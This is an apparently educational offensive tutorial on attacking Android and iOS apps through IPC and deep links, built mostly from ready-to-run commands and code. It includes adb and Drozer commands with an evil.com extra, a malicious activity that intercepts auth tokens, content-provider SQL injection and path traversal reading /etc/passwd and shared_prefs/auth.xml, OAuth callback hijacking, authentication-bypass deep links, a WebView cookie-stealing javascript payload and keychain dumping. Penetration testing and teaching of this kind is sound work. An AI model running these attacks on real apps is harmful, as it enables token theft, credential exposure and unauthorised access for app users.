Application Security
🔥 Advanced
IPC & Deep Link Attacks
Inter-Process Communication (IPC) mechanisms allow apps to share data and functionality. When improperly secured, they can be exploited to steal data, bypass authentication, or execute unauthorized actions.
Android IPC Mechanisms
Intents
Messaging objects used to request actions. Can be explicit (targeting specific component) or implicit (broadcast to multiple apps).
Content Providers
Structured data sharing mechanism. Can expose databases to other applications if exported.
Broadcast Receivers
Components that respond to system-wide broadcast messages. Can leak data if exported.
Services
Background components that can be bound to by other apps if exported without proper permissions.
Finding Exported Components
Manifest Analysis
bash
# Decompile and check AndroidManifest.xml
apktool d target.apk -o decompiled
# Look for exported components
grep -E "exported="true"" decompiled/AndroidManifest.xml
# Check for intent filters (auto-exported if present)
grep -B5 -A5 "<intent-filter" decompiled/AndroidManifest.xml
# Vulnerable patterns:
# android:exported="true"
# <intent-filter> (without exported="false")
# android:permission="" (empty permission)Drozer Analysis
Use Drozer for comprehensive IPC analysis:
bash
# Start Drozer
adb forward tcp:31415 tcp:31415
drozer console connect
# List exported activities
run app.activity.info -a com.target.app
# List exported services
run app.service.info -a com.target.app
# List exported broadcast receivers
run app.broadcast.info -a com.target.app
# List exported content providers
run app.provider.info -a com.target.app
# Find attack surface
run app.package.attacksurface com.target.appIntent Attacks
Starting Exported Activities
bash
# Using ADB to start activity
adb shell am start -n com.target.app/.AdminActivity
# With extra data
adb shell am start -n com.target.app/.DeepLinkActivity \
--es "url" "https://evil.com" \
--ei "user_id" 1337
# Using Drozer
run app.activity.start --component com.target.app com.target.app.AdminActivity
run app.activity.start --component com.target.app com.target.app.DeepLinkActivity \
--extra string url https://evil.comIntercepting Implicit Intents
java
// Malicious app registering for target's intent
<activity android:name=".MaliciousActivity">
<intent-filter>
<action android:name="com.target.app.SHARE_DATA" />
<category android:name="android.intent.category.DEFAULT" />
</intent-filter>
</activity>
// Intercept and log data
public class MaliciousActivity extends Activity {
protected void onCreate(Bundle savedInstanceState) {
Intent intent = getIntent();
String sensitiveData = intent.getStringExtra("auth_token");
Log.d("STOLEN", "Token: " + sensitiveData);
}
}Content Provider Attacks
SQL Injection
bash
# Find content URIs
run scanner.provider.finduris -a com.target.app
# Test for SQL injection
run app.provider.query content://com.target.app.provider/users --projection "* FROM users--"
# Extract all data
run app.provider.query content://com.target.app.provider/users
# Test injection with Drozer
run scanner.provider.injection -a com.target.app
# Path traversal
run app.provider.read content://com.target.app.provider/../../../etc/passwdPath Traversal
bash
# Test for path traversal
run scanner.provider.traversal -a com.target.app
# Read arbitrary files
run app.provider.read content://com.target.app.fileprovider/../../../../data/data/com.target.app/shared_prefs/auth.xml
# Using ADB
adb shell content read --uri content://com.target.app.provider/../../../data/data/com.target.app/databases/app.dbDeep Link Exploitation
What are Deep Links?
Deep links allow external URLs to open specific screens within an app. Improper validation can
lead to sensitive data exposure, authentication bypass, or cross-site scripting.
Finding Deep Link Schemes
bash
# Check AndroidManifest.xml for schemes
grep -E "android:scheme|android:host|android:pathPrefix" AndroidManifest.xml
# Example patterns:
# <data android:scheme="myapp" />
# <data android:scheme="https" android:host="app.target.com" />
# Test deep link
adb shell am start -a android.intent.action.VIEW \
-d "myapp://settings/admin" com.target.app
# Test App Links (Android)
adb shell am start -a android.intent.action.VIEW \
-d "https://app.target.com/oauth/callback?token=stolen"Common Deep Link Vulnerabilities
OAuth Token Theft
bash
# Intercept OAuth callback
adb shell am start -a android.intent.action.VIEW \
-d "myapp://oauth/callback?code=AUTH_CODE"
# Register malicious app to intercept:
<intent-filter>
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<data android:scheme="myapp" android:host="oauth" />
</intent-filter>Authentication Bypass
bash
# Skip login via deep link
adb shell am start -d "myapp://home?authenticated=true"
adb shell am start -d "myapp://admin?role=admin"
adb shell am start -d "myapp://reset-password?user_id=victim"JavaScript Injection (WebView)
bash
# If deep link loads in WebView with JS enabled
adb shell am start -d "myapp://webview?url=javascript:alert(document.cookie)"
adb shell am start -d "myapp://browser?url=file:///data/data/com.target.app/shared_prefs/auth.xml"iOS IPC Mechanisms
URL Schemes
bash
# Find URL schemes in Info.plist
plutil -p Info.plist | grep -A10 CFBundleURLTypes
# Or use ipainstaller to extract
unzip app.ipa -d extracted
plutil -p extracted/Payload/App.app/Info.plist
# Test URL scheme
# On device: Safari > myapp://admin
# Via Terminal:
xcrun simctl openurl booted "myapp://settings/admin"Universal Links
bash
# Check for associated domains in entitlements
codesign -d --entitlements :- App.app | grep associated-domains
# Fetch apple-app-site-association
curl https://target.com/.well-known/apple-app-site-association
curl https://target.com/apple-app-site-association
# Test Universal Links
# Send link via iMessage/Notes and tap itApp Extensions & Groups
bash
# Check for shared app groups
codesign -d --entitlements :- App.app | grep group
# Shared container location
/var/mobile/Containers/Shared/AppGroup/<group-id>/
# Using Objection
ios nsurlcredentialstorage dump
ios keychain dump --jsonDynamic Analysis with Frida
Android Intent Monitoring
javascript
Java.perform(function() {
var Intent = Java.use('android.content.Intent');
Intent.getStringExtra.implementation = function(name) {
var value = this.getStringExtra(name);
console.log('[Intent] getStringExtra(' + name + ') = ' + value);
return value;
};
Intent.getData.implementation = function() {
var uri = this.getData();
if (uri != null) {
console.log('[Intent] getData() = ' + uri.toString());
}
return uri;
};
// Monitor startActivity
var Activity = Java.use('android.app.Activity');
Activity.startActivity.overload('android.content.Intent').implementation = function(intent) {
console.log('[Activity] startActivity: ' + intent.toString());
console.log(' Action: ' + intent.getAction());
console.log(' Data: ' + intent.getData());
this.startActivity(intent);
};
});iOS URL Handling Monitor
javascript
if (ObjC.available) {
var UIApplication = ObjC.classes.UIApplication;
// Hook openURL
Interceptor.attach(UIApplication['- openURL:'].implementation, {
onEnter: function(args) {
var url = ObjC.Object(args[2]);
console.log('[openURL] ' + url.toString());
}
});
// Hook application:openURL:options:
var AppDelegate = ObjC.classes[ObjC.protocols.UIApplicationDelegate];
Interceptor.attach(AppDelegate['- application:openURL:options:'].implementation, {
onEnter: function(args) {
var url = ObjC.Object(args[3]);
console.log('[application:openURL] ' + url.toString());
}
});
}IPC Testing Checklist
- ☐ Identify all exported components
- ☐ Test content providers for SQL injection
- ☐ Test content providers for path traversal
- ☐ Enumerate and test all deep link schemes
- ☐ Test for intent hijacking vulnerabilities
- ☐ Check broadcast receivers for data leakage
- ☐ Verify proper permission checks on services
- ☐ Test WebView URL loading via deep links
- ☐ Check OAuth callback interception